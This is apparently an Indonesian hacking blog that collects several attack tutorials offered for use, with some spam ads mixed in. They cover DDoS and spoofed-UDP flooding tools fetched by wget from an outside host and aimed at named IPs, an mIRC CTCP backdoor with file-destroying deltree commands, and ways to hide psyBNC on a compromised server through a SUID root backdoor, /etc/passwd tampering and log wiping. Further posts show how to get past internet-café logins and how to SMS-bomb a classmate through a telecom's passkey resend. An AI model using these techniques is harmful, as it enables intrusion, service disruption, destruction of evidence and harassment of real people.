Maulana Malik Ibrahim

Ada beberapa jenis senjata untuk ddos, tapi tetap saja tujuannya satu yaitu untuk melumpuhkan lawan...

1. Automatic Flooding packet
kekekek...
Pusing ama udp.pl jangan khawatir ini saya bikin sedikit tool
jadi kita gak bersusah payah nungguin shell buat flooding
tools ini bekerja efektif akan menyerang setiap 15 menit sekali dengan rentang 1 menit istirahat..
coba deh ok banget ..:D
download file nya disini..
Ddos

selanjutnya:
tar -zxvf ddos.tar.gz
cd ./DENIAL

trus ketik
./terus 0 000000000000000000;./bunuh;./ran

2. Tembak C
wget http://h1.ripway.com/mau1ana/tutorial/tembak/tembak.tgz
atau Download disini
Tembak C
ketik di shell
terus enter
mv tembak.tgz tembak.c
gcc -o tembak tembak.c

baru kita laksanakan penembakan
./tembak ip port

Tembaaak..!!! target 125.162.97.48 port 53

3. Vadim
wget http://h1.ripway.com/mau1ana/tutorial/tembak/vadim.tgz
tar -zxvf vadim.tgz
rm -rf vadim.tgz
cd flood
./vadimI ip port time
./vadim 202.65.236 53 1000

4. Exploits flooding UDP dengan IP source di spoofing
Sekarang saya mau berbagi exploits flooding UDP dengan IP source di spoofing, jadi susah di cari asal flooding dan susah di blok juga qe3x. Pertama-tama downlod dulu exploits floodingnya di
http://h1.ripway.com/mau1ana/tutorial/tembak/f-udp.tar.gz
atau Download di bawah ini
Exploits flooding UDP
Exploitsnya hanya bekerja dilinux dan karena harus pakai spoofing butuh root untuk mengakses raw socket. Cara pakeknya
root#wget http://h1.ripway.com/mau1ana/tutorial/tembak/f-udp.tar.gz
root#tar zxcf f-dup.tar.gz
root#cd f-udp
root#./fudp
Simple UDP Flooder With Spoofing Support
By : Anonymous [at]Undergroundz

Gunakan : ./fudp
Untuk Contoh : ./fudp 10.10.10.xxx 53 (This is to flood DNS port)

root#./fudp 172.16.11.119 53

nah nanti ditarget, IP yang kebaca random ini misal hasil tcpdump
nya.

korban#tcpdump udp
22:37:47.938403 IP 34.72.100.23.2555 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.938519 IP 34.72.100.23.2555 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.940737 IP 176.156.132.90.13295 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:47.940854 IP 176.156.132.90.13295 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:48.877756 IP 124.204.8.59.13344 > 172.16.11.119.domain: 0 [0q] (1400)
22:37:48.877872 IP 124.204.8.59.13344 > 172.16.11.119.domain: 0 [0q] (1400)

korban# ifstat -b
eth1
Kbps in Kbps out
6500.14 526.43
42242.85 3042.93
42411.86 2959.97
42243.99 2904.69
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

kode ini, mungkin sebutannya backdoor lebih tepatnya karena dapat memberikan akses penuh ke komputer yg terinfeksi melalui remote didalam mirc. kode ini saya pertama kali lihat di remote mirc saya ketika saya sedang di kerjain teman saya sendiri,lalu saya mencoba bertanya kepada dia bagaimana cara kerjanya? lalu dia menjelaskan kepada saya cara kerjanya. Kode mirc-nya sebagai berikut : ctcp *:*:?:$1- di taruh di remote lawan anda,..
mungkin anda semua bisa mencobanya sendiri dengan membuka 2 mirc di komputer anda yg sudah terkoneksi, lalu anda taruh kode ini di salah satu mirc yang mau di ujikan. cara kerja kode ini melalui client to client protokol. kode tersebut memberikan akses penuh kepada siapa saja yang meng query mirc yang terinfeksi dgn perintah-perintah standard yang di gunakan dalam mirc. perintahnya:
misalkan nick yg terinfeksi = dedi-plg
1. untuk merubah nicknya cukup menggunakan perintah /ctcp dedi-plg nick gua_bego , nick lansung berubah ke gua_bego
2. untuk membuat mirc terinfeksi mengirimkan msg /ctcp gua_bego msg nick-yg-mau-di-msg/#channel tesssstessssssstesssssss123 tapi jangan pake kata kotor ,, kasihan juga ntar kena banned hehehhhe
3. untuk membuat dia menjalankan program. /ctcp gua_bego run iexplore.exe www.jasakom.com
4. untuk meng-shutdown komputer lawan. /ctcp gua_bego run rundll32.exe user,exitwindows
Mungkin ini agak seram kalo di buat perintah untuk menghancurkan komputer lawan,.. kalo anda terpikir utk mem-format komputer lawan,, kayaknya bakalan susah karena kalo anda menjalankan format c:, kemungkinan tidak bisa karena hard-disk terpakai oleh mirc terinfeksi . tapi kalo di pikir-pikir masih bisa juga mendelete files komputer terinfeksi kode ini yaitu dengan cara menggunakan perintah:/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows\system
/ctcp gua_bego run c:\windows\command\deltree /y
c:\windows
--kayaknya bakal berabe deh.
# Tolong jangan di pakai buat merusak komputer yang terinfeksi, mungkin anda bisa menggunakan perintah-perintah yang tidak merusak just for phun
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Saya akan mencoba memberikan trik kepada Anda tentang bagaimana menyembunyikan PSYBNC Anda dari si Admin sehingga seminimal mungkin PSYBNC Anda tidak akan di curigai oleh si Admin. Banyak sekali kecerobohan-kecerobohan yang di lakukan oleh kita ketika kita memasang PSYBNC di target yang mengakibatkan PSYBNC Anda tidak bertahan lama padahal jika Anda bisa mengakali system dan mencoba mempelajari system tersebut Anda akan dapat menemukan teknik-teknik ini. Di sini Anda hanya di tuntut untuk bisa kreatif dalam mengakali system tersebut.
Sebelumnya saya akan membeberkan beberapa kecerobohan yang sering kita lakukan ketika kita memasang PSYBNC di server target:
1. Menjalankan PSYBNC dengan login user yang kita add di shell target.
Ini adalah kecerobohan yang paling fatal yang seringkali kita lakukan. Kalau saya menjadi seorang Admin ketika saya akan mengecek system maka yang akan saya cek pertama kali adalah file /etc/passwd karena di file tersebutlah terdapat seluruh nama user yang bisa login ke system. Ketika saya menemukan ada nama user yang berbeda dengan nama user yang ada di file /etc/passwd yang sebelumnya saya backup maka bisa di pastikan bahwa ada user illegal yang baru saja masuk ke dalam system. Dan ketika saya menemukan kejanggalan ini maka saya akan langsung menghapus home direktori dari user tersebut dengan recursife mode yang berarti seluruh folder beserta isinya akan di hapus tanpa kompromi. Bisa di pastikan juga bahwa file PSYBNC Anda yang di simpan di folder tersebut akan ikut terhapus.
file yang asli….
….
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
xnuxer:x:500:500::/home/xnuxer:/bin/bash

isi file /etc/passwd yang telah termodifikasi….

….
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
xnuxer:x:500:500::/home/xnuxer:/bin/bash
anto:x:76:75::/etc/.anto:/bin/bash ß dari sini si Admin bisa menebak

2. Menyimpan file PSYBNC di folder yang tidak tersembunyi.
Bila kita melihat contoh kasus di point pertama di atas Anda seharusnya menyembunyikan folder psybnc dan merubah nama folder dengan nama lain sehingga ketika si Admin mengecek folder user dengan menggunakan command ls maka file Anda tidak akan terlihat.
3. Menjalankan PSYBNC dengan menggunakan nama file PSYBNC atau file konfig yang tidak di rename nama filenya.
Ketika si Admin sudah mencurigai bahwa systemnya telah di masuki orang lain maka bisa di pastikan si Admin akan mengecek file-file yang running di system dengan menggunakan perintah ps –ax dan si Admin melihat ada process system yang menggunakan nama PSYBNC maka bisa di pastikan si Admin akan langsung menjalankan perintah killall psybnc dan semua file yang di run dengan nama tersebut langsung mati.

1058 tty3 S 0:00 /sbin/mingetty tty3
1059 tty4 S 0:00 /sbin/mingetty tty4
1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 -bash
1103 tty2 R 0:00 ./psybnc psybnc.conf
1124 tty1 R 0:00 ps -ax

Jadi gimana caranya…? Saya akan memberikan trik yang aman yang bisa Anda coba dan Anda kembangkan sendiri. Dengan melihat tiga kasus di atas maka ada beberapa cara untuk mengatasinya.

- Jangan membuat user login ke dalam file /etc/passwd ketika Anda mendapatkan akses root dengan menggunakan eksploit tapi manfaatkan user yang sudah ada di file tersebut dan user tersebut di pakai oleh system dengan menggunakan shell bash atau sh. Misalnya seperti: news, mysql, postgres, etc. Anda bisa memilih beberapa user system yang bisa di manfaatkan, kemudian hapus password dari user tersebut dengan menggunakan perintah passwd –d [nama user] sehingga ketika Anda login dengan menggunakan nama user tersebut, password tidak akan di minta oleh system. Jika Anda login dengan menggunakan SSH yang sudah jalan di system hal ini tidak berlaku dan Anda tetap akan di mintai password kecuali jika Anda bisa mengakali SSH target dengan menggunakan beberapa trik (hehehe…. ).

contoh user yang bisa di pakai …
rpm:x:37:37::/var/lib/rpm:/bin/bash

menghapus password rpm …
sh-2.05# passwd -d rpm
Changing password for user rpm
Removing password for user rpm
passwd: Success

setelah password di hapus …

bash$ su rpm
[rpm@serv /var/lib/rpm]$

- Jalankan beberapa backdoor di system yang bisa memberikan akses root tanpa harus merubah file /etc/passwd seperti di bawah ini:

bash# ./sux
Backdoor SUID by Schizoprenic. Xnuxer Research Center, 2002
Private Only!, Don't Distributed...!
Step 1 - Checking paths and write permisions
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Step 2 - Creating evil libc.mo and setting enviroment vars
Step 3 - Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804cd4c
Step 4 - Compiling suid shell
/tmp/.sh created Ok
Step 5 - Executing /bin/su
Step 6 - Set permission file...
Step 7 - Successfull...!
Run root shell with type /tmp/.sh, Enjoy bro ;P ...!
bash# exit
bash$ /tmp/.sh
sh-2.05# id
uid=0(root) gid=0(root) groups=500(xnuxer)

- Buat nama direktori tersembunyi dengan menggunkan akses root di lokasi yang sering di pakai oleh system seperti di direktori /etc, /var, dsb dengan menggunakan karakter ‘.’ (titik) di depan direktori yang akan kita buat ( .sh ). Caranya adalah sbb:

bash# mkdir /var/log/… ß Ini dia direktori yang tersembunyi hehehe….
bash# chmod 700 /var/log/…
bash# chown xnuxer:xnuxer /var/log/…

xnuxer adalah nama user yang sudah ada di /etc/passwd (tanpa merubah file tersebut) yang nanti akan di gunakan untuk menjalankan file psybnc.

- Gunakan nama user yang ada di file /etc/passwd yang bukan milik system untuk menjalankan file psybnc Anda dengan cara menghilangkan karakter ‘x’ setelah nama user. Jangan menggunakan perintah passwd –d [nama user] untuk menghilangkan password user tersebut karena hal ini akan mengakibatkan kecurigaan user yang login dengan name login yang kita pakai ketika dia login dan tidak di mintakan password oleh system. Dengan menambahkan kembali karakter ‘x’ di user name yang kita hapus karakter ‘x’ –nya, hal ini akan mengembalikan password user tersebut tanpa perlu proses yang rumit.

sebelum karakter ‘x’ di hapus …

xnuxer:x:500:500::/home/xnuxer:/bin/bash

sesudah karakter ‘x’ di hapus …
xnuxer::500:500::/home/xnuxer:/bin/bash
login dengan user yang karakter ‘x’ sudah di hapus …
bash$ su xnuxer
[xnuxer@serv /home/xnuxer]$
mengembalikan karakter ‘x’ yang di hapus …
xnuxer:x:500:500::/home/xnuxer:/bin/bash
login dengan user yang karakter ‘x’ sudah di tulis kembali …

bash$ su xnuxer
password:
- Setelah Anda menghapusk karakter ‘x’ di /etc/passwd dengan menggunakan akses root selanjutnya login dengan nama user tersebut. Kemudian masukalh ke direktori tersembunyi yang telah kita buat seperti contoh di atas.

bash$ cd /var/log/…

simpan file psybnc Anda di direktori ini dan rename file psybnc Anda dengan nama lain misalnya … atau .sh

bash$ mv psybnc …

ganti juga nama konfig psybnc dengan nama yang tidak di curigai
bash$ mv psybnc.conf httpd
jalankan psybnc….

bash$ ./… httpd
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3 (c) 1999-2001
the most psychoid
and the cool lam3rz Group IRCnet

Configuration File: httpd
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 3456
psyBNC2.3-cBtITLdDMSNp started (PID 379185)

so? Heheheh… sekarang Anda bisa memakai psybnc Anda… dan ketika si Admin menjalankan perintah ps –ax maka akan terlihat proses seperti di bawah ini:

1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 –bash
1132 tty2 R 0:00 ./… httpd
1136 tty1 R 0:00 ps -ax

- Keluarlah dari user login yang Anda pakai, kemudian dengan akses root tambahkan kembali karakter ‘x’ di user name yang Anda pakai tadi untuk mengembalikan password user yang Anda pakai.

mengembalikan karakter ‘x’ yang di hapus …
xnuxer:x:500:500::/home/xnuxer:/bin/bash

login dengan user yang karakter ‘x’ sudah di tulis kembali …
bash$ su xnuxer
password:

Demikian cara yang saya tawarkan kepada Anda yang bisa menjadikan pilihan bagi Anda untuk memperpanjang umur psybnc hehehehe…. Saya sarankan juga agar Anda menghapus log yang ada di system baik dengan program Log Remover atau program penghapus log yang lain.

sh-2.05# ./rem postgres
Log Remover by Schizoprenic, Xnuxer Research Center, 2002
Step 1 - Check log...
Found 2 record(s) for user postgres
Step 2 - Cleaning Up....
Cleaning up 2 record(s) from /var/log/wtmp ... OK
Cleaning up 2 record(s) from /var/run/utmp ... OK
Cleaning up /var/log/lastlog ... OK
Cleaning up /var/log/messages ... OK
Cleaning up /var/log/secure ... OK
Cleaning up /var/log/maillog ... OK
Step 3 - Successfull Cleaning up...

Sekian trik dari saya, jika Anda ingin maju belajarlah untuk kreatif dan kuasai system Anda bukan system yang membuat Anda terkuasai, pelajari system so.. Anda akan menemukan jawaban dari apa yang Anda cari selama ini.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Kali ini saya berhasil bereksperimen dan nyobain tools-tools kecil tapi bermanfaat bangget!!!
Ok! Langsung saja. Target saya kali ini adalah WARNET!!!
Tools yang dibutuhkan :
1. Zhider 2.0 atau AceHider Free
2. Startup Manager

Toolsnya bisa dicari melalui paman google atau download dibawah ini:
Zhider 2.0
Log in seperti biasa diwarnet kesayangan kamu (bioskop kali!!!)
Setelah online, saatnya beraksi
Buka zhider.exe, untuk membaca keterangan tentang software tersebut dan penggunaannya silakan baca readme.txt.
Setelah Zhider.exe diexecute, maka akan tampak pada tab Processes di Task Manager

Bila menggunakan Kapersky Antivirus maka akan terdeteksi sebagai Invader

Untuk amannya bisa menggunakan AceHider Free, tapi perlu diinstall. Apalagi status kamu cuma Guest bukan Administrator, jadi mustahil untuk menginstall sebuah software kedalam kompi.
Tapi jangan khawatir, kali ini gue udah siapkan semua.
Kamu bisa mengesktrak Folder AceHider Free dari Tools Hacking.Zip, atau AceHider Free.exe dari folder tersebut.
Tapi bila menggunakan AceHider Free maka akan tampak pada taskbar, sehingga kemungkinan ketahuan akan lebih besar.
Sekarang tinggal memilih tools mana yang ingin kamu pakai Zhider atau AceHider Free?
Kita masuk dalam penggunaan tools tersebut

1. Menggunakan Zhider
Bila kita menggunakan Zhider, kendala yang akan kita dapati adalah terdeteksi oleh antivirus, tapi biasanya warnet dikota gue memakai McAfee dan NOD32, walaupun diupdate tetap saja nggak bisa dideteksi. Kecuali menggunakan Kapersky, itupun hanya terdeteksi bila Task Manager dibuka. Oleh karena itu Zhider cukup aman untuk dipakai.
Setelah mengeksekusi Zhider.exe, kita dapat mencobanya dengan menyembunyikan jendela apapun yang sedang aktif. Untuk menyembunyikan jendela yang sedang aktif tekan Ctrl+Alt+Z, sedangkan untuk menampilkan kembali jendela tersebut tekan Ctrl+Alt+X.
AceHider dapat dijalankan walaupun kompi direstart, tapi Zhider tidak. Oleh karena itu gunakanlah Startup Manager yang ada di tools hacking.zip, dengan file bernama strun.exe. Fungsinya untuk menjalankan sebuah aplikasi waktu kompi di Reboot.
Kita akan mengaktifkan Zhider.exe pada waktu kompi di reboot, sehingga pada waktu kita mampir kewarnet, kita bisa main GRATISSS!!! Khan tinggal di Ctrl+Alt+Z, jendela log ini akan disembunyikan. Browsing deh sesuka hati:p
Jalankan strun.exe, buka File, new startup item (Ctrl+N)
Tambahkan Zhider.exe, dengan membuka Zhider pada tempat anda menyimpan file tersebut. Berilah nama untuk Zhider dengan nama yang tidak mencurigakan seperti Adobe Updater. Ok ! Selesai deh!


Sekarang, log out dan klik pada jendela log in tepatnya didaerah kosong dimana saja, kemudian tekan Ctrl+Alt+Z.
2. Menggunakan AceHider Free
Bila kita menggunakan AceHider, maka akan terasa lebih mudah. Aktifkan Acehider, untuk menyembunyikan jendela yang sedang aktif double klik pada icon tray pada taskbar, maka jendela yang aktif akan disembunyikan, untuk menampilkan kembali, klik kanan pada icon tray. Kemudian pilih Show Window.
Anda dapat mengatur program ini sesuka hati dengan mengatur Preferences.
Klik kanan lalu pilih Preferences, gantilah system hot keys dengan pilihan anda




Setelah itu log out, dan tekan tombol sesuai pilihan anda yang telah anda atur untuk menyembunyikan jendela log in

Ingat !!! Jangan lupa berdoa sebelum tidur, sorry Resiko tanggung sendiri.
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Mau mbaca iklan, trus dapet duit? mau dapet bonus $10 ketika sign up?, mau?
untuk daftar klik > disini
dan dapatkan bonusmu $10
Buruannnnn...........
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

anda mau surfing dan dibayar karenanya?
ada program simple yang bisa membuat anda memiliki $25 dalam waktu 10 menit
dan anda bisa join dengan gratis!!!!!!!!!
c'mon to make money online

mau join klik aja disini
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design

Sebel sama orang? wew sering atuh w juga wkwkwkwkwk, tapi yang ini bner bner nybelin tw!
Cek dan ricek ternyata anak sekelas, dan dia pakai im3, hihihihi salah besar dia ngerjain orang kyak w :)
Langsung saja nomor dia w bomb selama satu jam!! wkwkwk ribuan sms pun datang kepada dia :)
Handphone nya hank! sukur mank enak!! wkwkwkwkw, ok to the point.
Persiapan:
1. Browser Mozilla Firefox
2. Addons ReloadEvery download dan install disini
https://addons.mozilla.org/en-US/firefo ... 2.0-fx.xpi
3. Koneksi Kenceng *periphreal*
Langkah:
1. Browse ke http://www.indosatcommunity.com/registration
2. Registrasi saja asal asalan
- Isi username asal asalan
- Password isi asal asalan
- Cocokan capctha

3. Setelah registrasi daftarkan MSISDN target Bomb contoh 62856161651 tersedia kotak box 4


4. Klik Register
5. Nah disini klik Send Passkey Again disebelah kotak box kosong..
6. Stelah di klik Send Passskey Again akan muncul tulisan Your passkey has been sent!


7. Klik kanan di page lalu pilih Reload Every dan Custom kan ke 1 - 2 Seconds..
8. Jika mucul dialog Box, tekan ENTER bukan di klik OK
9. Selesai :) tunggu selama 1 jam / 2 jam tergantung kekeselan kamu :D

Dalam proses pengeboman jangan membuka tab lain yang menuju ke page registrasi IndosatCommunity.com karena akan mengulang cookies kamu dan ternyata setelah di Reload Every ternyata page nya redirect ke step awal..

Target Bomb akan mendapat sms yang isinya
Sender: INDOSAT
Body: Passkey Anda untuk Indosat Community adalah xxxx
Label : Phone Cell Wallpapers Game Phone Free Games Free car body design